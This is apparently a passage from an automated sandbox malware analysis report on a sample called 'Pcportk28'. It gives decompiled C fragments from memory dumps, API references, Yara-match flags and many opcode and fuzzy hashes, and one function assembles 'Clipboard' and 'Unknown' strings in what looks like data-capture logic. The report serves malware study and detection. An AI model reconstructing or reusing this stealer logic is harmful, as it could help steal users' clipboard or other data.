                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00418930(intOrPtr _a4, int _a8) {
                                                				void* _t10;
                                                
                                                				_t5 = _a4;
                                                				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                				ExitProcess(_a8);
                                                			}

                                                Instruction addresses: 0x00418933, 0x0041894a, 0x00418958

                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418958
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction ID: 003a916221f8a0ce374a44117b8fbe88b89a524691b6392432483a5b9729c210
                                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction Fuzzy Hash: 96F022203248499BDB48EB188C55E6A33D5FBA4300F69C0B8ED49C7341D631ED008291
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E0041565B(void* __eax, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __fp0) {
                                                				intOrPtr* _t16;
                                                				void* _t25;
                                                				signed int _t27;
                                                
                                                				_t7 = __eax;
                                                				_t1 = _t25 + 0x3d201314;
                                                				 *_t1 =  *(_t25 + 0x3d201314) & _t27;
                                                				if( *_t1 >= 0) {
                                                					_t25 = _t25 + 1;
                                                					asm("sbb al, 0x9a");
                                                					 *__edx =  *__edx | __edx;
                                                					asm("outsb");
                                                					asm("cmpsb");
                                                					_pop(_t16);
                                                					_t7 = 0xd28c93b1;
                                                					 *_t16 =  *_t16 + __esi;
                                                					asm("sbb [ebp-0x45], edi");
                                                					 *((char*)(__edx + 0x4a)) =  *((char*)(__edx + 0x4a)) + 1;
                                                				}
                                                				asm("pushad");
                                                				return _t7;
                                                			}

                                                Instruction addresses: 0x0041565b, 0x0041565b, 0x0041565b, 0x00415661, 0x00415663, 0x00415664, 0x00415669, 0x00415673, 0x00415675, 0x00415678, 0x00415679, 0x0041567e, 0x00415681, 0x00415684, 0x00415687, 0x00415689, 0x00415696

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4498b939d477bdd831384b705a897eefb9f297ce36748400b64d47ebfcc829f1
                                                • Instruction ID: 767547cde68b77bae2faa2b87bd6e48cd130564548972f7abff9d9c339430fbb
                                                • Opcode Fuzzy Hash: 4498b939d477bdd831384b705a897eefb9f297ce36748400b64d47ebfcc829f1
                                                • Instruction Fuzzy Hash: D1E0C077E4D1454BD3074920A9000F0BB71FD8323572821CFDC087B281E60A444F53C6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E00406AB6(void* __eax, void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                				short _v8;
                                                				intOrPtr _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				char _v32;
                                                				short _v34;
                                                				short _v38;
                                                				short _v42;
                                                				short _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				char _v64;
                                                				void* _t39;
                                                				intOrPtr _t68;
                                                				intOrPtr _t84;
                                                				void* _t91;
                                                				void* _t93;
                                                				void* _t95;
                                                				void* _t96;
                                                
                                                				if(__ebx != 0xd6) {
                                                					asm("int3");
                                                					asm("int3");
                                                					_t39 = E0041A3B0(_a8);
                                                					_t93 = _t91 - 0x3c + 4;
                                                					if(_t39 <= 0x1000) {
                                                						_t84 = _a4;
                                                						_t68 =  *((intOrPtr*)(_t84 + 0x7d8));
                                                						if(_t68 != 0) {
                                                							_push(__ebx);
                                                							_t79 = _t39 + _t39;
                                                							_t61 = _t68 + 0x1ff56c;
                                                							_t39 = E0041A3D0(_a8, _t68 + 0x1ff56c, _t39 + _t39);
                                                							_t95 = _t93 + 0xc;
                                                							if(_t39 == 0) {
                                                								E0041A0C0(_t61, _a8, _t79);
                                                								_t96 = _t95 + 0xc;
                                                								_v8 = 0;
                                                								_t63 = _t84 + 0x4464;
                                                								_v16 = 0xa000d;
                                                								_v12 = 0xa000d;
                                                								_v64 = 0x6c0043;
                                                								_v60 = 0x700069;
                                                								_v56 = 0x6f0062;
                                                								_v52 = 0x720061;
                                                								_v48 = 0x64;
                                                								_v44 = 0;
                                                								_v42 = 0;
                                                								_v38 = 0;
                                                								_v34 = 0;
                                                								 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xcc0))))(_t84 + 0x4464, 0x104);
                                                								 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xcbc))))(0);
                                                								if(0 <= 0x40) {
                                                									if(0 == 0) {
                                                										_v32 = 0x6e0055;
                                                										_v28 = 0x6e006b;
                                                										_v24 = 0x77006f;
                                                										_v20 = 0x6e;
                                                										E0041A0C0(_t63,  &_v32, 0x10);
                                                										_t96 = _t96 + 0xc;
                                                									}
                                                								} else {
                                                									 *((short*)(_t84 + 0x44e4)) = 0;
                                                								}
                                                								_t81 = _t84 + 0x4ce4;
                                                								E0041A0C0(_t84 + 0x4ce4,  &_v64, 0x14);
                                                								E0041A520(_t84 + 0x4ce4,  &_v16, 0);
                                                								E0041A520(_t81, _t63, 0);
                                                								E0041A520(_t81,  &_v16, 0);
                                                								E0041A520(_t81, _a8, 0);
                                                								 *((intOrPtr*)(_t84 + 0xa08)) = E0041A3B0(_t81) + _t50;
                                                								E0041A0C0( *((intOrPtr*)(_t84 + 0xa04)), _t81, E0041A3B0(_t81) + _t52);
                                                								_t39 = E0040CE10(_t84, 0x13);
                                                							}
                                                						}
                                                					}
                                                					return _t39;
                                                				} else {
                                                					asm("fisub word [edi+0x5f]");
                                                					asm("pushad");
                                                					asm("lock fild qword [edi]");
                                                					return 1;
                                                				}
                                                			}

                                                Instruction addresses: 0x00406ab9, 0x00406ade, 0x00406adf, 0x00406aea, 0x00406aef, 0x00406af7, 0x00406afe, 0x00406b01, 0x00406b09, 0x00406b0f, 0x00406b11, 0x00406b14, 0x00406b20, 0x00406b25, 0x00406b2a, 0x00406b36,
                                                0x00406b3b, 0x00406b47, 0x00406b51, 0x00406b58, 0x00406b5f, 0x00406b66, 0x00406b6d, 0x00406b74, 0x00406b7b, 0x00406b82, 0x00406b89, 0x00406b8d, 0x00406b90, 0x00406b93, 0x00406b97, 0x00406ba0,
                                                0x00406ba5, 0x00406bb4, 0x00406bbd, 0x00406bc4, 0x00406bcb, 0x00406bd2, 0x00406bd9, 0x00406bde, 0x00406bde, 0x00406ba7, 0x00406ba9, 0x00406ba9, 0x00406be7, 0x00406bee, 0x00406bfa, 0x00406c03,
                                                0x00406c0f, 0x00406c1b, 0x00406c2c, 0x00406c42, 0x00406c4a, 0x00406c4f, 0x00406c53, 0x00406c54, 0x00406c58, 0x00406abb, 0x00406abb, 0x00406abf, 0x00406ac0, 0x00406ad4, 0x00406ad4

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4607186b42d5b5a5e29d51a271643ac0f3a155742664701c3efe553416da7b46
                                                • Instruction ID: d8fdf74bd154e90eb4e1a68ba4e3c2b7177d9f6105a386f0bf4ccbe95c9ad28f
                                                • Opcode Fuzzy Hash: 4607186b42d5b5a5e29d51a271643ac0f3a155742664701c3efe553416da7b46
                                                • Instruction Fuzzy Hash: 1DD02222B040088AD2150DE8B8402F4F334FB4723CF1423A3D509ABDA193B2C83242C8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 438120aef26b49d67c4ae3dfe058a4e197c02dd163ec59c944d3bf86aa6c3256
                                                • Instruction ID: a7faff7bd961c66fc992597b1f76531c32633d1a54af54b7cf4ee455a3c7ac61
                                                • Opcode Fuzzy Hash: 438120aef26b49d67c4ae3dfe058a4e197c02dd163ec59c944d3bf86aa6c3256
                                                • Instruction Fuzzy Hash: 4CC01292E454C4A292152E79BC868B8F724E4E31D57A832E7C908B70069827C41885ED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
